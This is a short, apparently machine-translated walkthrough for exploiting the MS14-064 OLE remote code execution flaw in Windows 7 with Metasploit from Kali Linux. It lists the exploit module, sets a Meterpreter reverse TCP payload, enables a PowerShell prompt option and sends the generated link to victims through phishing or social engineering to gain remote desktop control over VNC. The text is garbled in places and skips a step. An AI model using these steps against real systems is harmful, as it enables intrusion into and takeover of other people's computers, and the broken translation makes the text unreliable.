MS14-064OLE Remote Code Execution Vulnerability
Attack: Kali Linux 2019
Drone: Windows 7 x64, x32
Attack steps:
1. Open the attack aircraft Kali Linux 2019 systems and drones Windows 7 system
2. Make sure the IP address, Kali Linux open msf module, ready to attack test
3. Here we use MS14-064OLE remote code execution vulnerability, MS14-064 Start Search
(search MS14-064)
4. We use use exploit / windows / browser / ms14_064_ole_code_execution loaded exploit module
(use exploit/windows/browser/ms14_064_ole_code_execution)
The detail configuration, the next step of the detailed configuration
6. Start the configuration payload, SRVHOST LHOST address and the address of the next module in the Payload
(Payload:set payload windows/meterpreter/reverse_tcp)
(LHOST Address: Kali Linux IP address)
(SRVHOST Address: Kali Linux IP address)
7. note the position of the arrow on the map, which should be familiar with changed default false true, because msf vulnerability that comes with using powershell call is exp, exp code only so msf of entry into force of the powershell system installation, here we tested with windows 7 system.
(命令:set ALlowPowershellPrompt true)
8. Enter exploit testing, will generate a url link, or by fishing method is social engineering reached Win7 host, the control can be achieved
9. extracted permissions, complete penetration can be remote desktop control, observation operation desktop,
(Run vnc observation interface)
